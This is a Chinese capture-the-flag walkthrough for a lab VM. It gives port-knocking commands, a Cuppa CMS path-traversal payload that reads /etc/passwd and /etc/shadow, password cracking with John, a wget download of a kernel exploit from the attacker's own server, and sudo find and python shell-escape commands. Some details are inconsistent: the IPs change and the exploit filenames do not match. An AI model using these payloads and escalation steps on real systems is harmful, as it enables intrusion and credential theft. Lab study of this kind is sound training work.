load of the root拿flag思路

load of the root拿flag思路
1.主机发现,端口扫描
2.21,22,80和3306端口 的发现
3.访问80端口,发现是apache的首页,无果
4.发现21端口存在anonymous用户
5.ftp访问anonymous发现有三个文件,结果毛都没有
6.对80端口进行目录扫描一下
7.发现使用了cuppa的cms
8.搜索cuppa-cms的相关漏洞,存在Local/Remote File Inclusion
9.漏洞利用读取本地shadow
10.使用john 爆破密码
11.ssh连接
12.查看版本和内核看是否可以内核提权,提权报错
13.发现有sudo权限,尝试sudo 提权
14.在 /root 下获得 flag

第一步:找到目标主机

首先ifconfig找到本机ip
在这里插入图片描述
通过netdiscover扫描存活主机

netdiscover -r 172.16.12.0/24

在这里插入图片描述
nmap -T5 -A -Pn 172.16.12.138
在这里插入图片描述
通过nmap扫描出来22端口,发现22端口存在Knock Friend To Enter,
在这里插入图片描述
通过查询发现这是Port knocking
端口碰撞: 端口上的防火墙通过产生一组预先指定关闭的端口进行连接尝试,一旦接收到正确的连接尝试序列,防火墙规则就会动态修改,以允许发送连接尝试的主机通过特定端口进行连接。
有三种方法:

第一种:
knock <IP> <PORT1> <PORT2> <PORT3> <PORT4> -v
knock 172.16.12.138 1 2 3 -v
第二种:
nmap 172.16.12.138 -Pn -p 1
第三种:
hping3 -S 172.16.12.138 -p 1 -c 1

在这里插入图片描述
重新再扫一次端口
nmap -T5 -A -Pn -p- 172.16.12.138

在这里插入图片描述
发现除22端口外,还存在1337端口,访问发现存在网页
利用21端口的Anomonous进行访问
发现无果,都是一些废话,继续打开80端口,进行目录扫描

第二步:目录扫描

python dirsearch.py -u http://192.168.159.132/ -e * -x 403,404

在这里插入图片描述
从上到下,进行访问,看是否有突破点
从中发现了使用的是cuppa cms,还有一个wordpress,但无果

搜索相关的payload

searchspoit cuppa
searchspoit wordpress

在这里插入图片描述
在这里插入图片描述
尝试利用25971.txt

https://www.exploit-db.com/exploits/25971

在这里插入图片描述
拼接访问

http://192.168.159.132/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

发现没发现,可能是路劲拼接错误,继续尝试

http://192.168.159.132/administrator/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

这个也报错,最后尝试发现去掉cuppa就可以访问了,但是显示空白的

http://192.168.159.132/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

在这里插入图片描述
继续返回漏洞介绍,发现是$_REQUEST,可能是GET也可能是POST,尝试POST
在这里插入图片描述
出现了/etc/shadow,有账户和加密密码

尝试用John the ripper进行密码爆破,首先把字符串复制出来
在这里插入图片描述

john shadow

在这里插入图片描述
尝试SSH连接
在这里插入图片描述

第三步:提权

通过查询系统版本和内核版本,看是否可以内核提权

lsb_release -a
uname -a

在这里插入图片描述

发现ubuntu版本为16.04.3,内核为4.13.0
使用 searchsploit 从 exploit-db 中搜索相关信息

searchsploit ubuntu 4.13

在这里插入图片描述
尝试使用,并查看使用方法

searchsploit -m 45010.c
vi 45010.c

在这里插入图片描述
本地起一个HTTP服务

python3 -m SimpleHTTPServer 8081
若出现No module named SimpleHTTPServer,使用下面的 
python3 -m http.server 8081

bash shell端进行下载

wget http://192.168.159.129:8081/45010.c

编译EXP
根据使用条件 进行利用
gcc 37292.c -o exp —GCC编译.o文件
./exp —利用exp

在这里插入图片描述
利用失败
在这里插入图片描述
尝试是否存在sudo提权

https://www.yisu.com/zixun/461396.html

sudo -V

在这里插入图片描述
可能存在sudo提权

find 命令提权:
sudo find . -exec /bin/sh \; -quit
python 命令提权:
sudo python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
进入root目录下,发现flag.txt
在这里插入图片描述

总结:

这个靶机主要是考察了三个点,目录扫描,cms漏洞,sudo提权

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值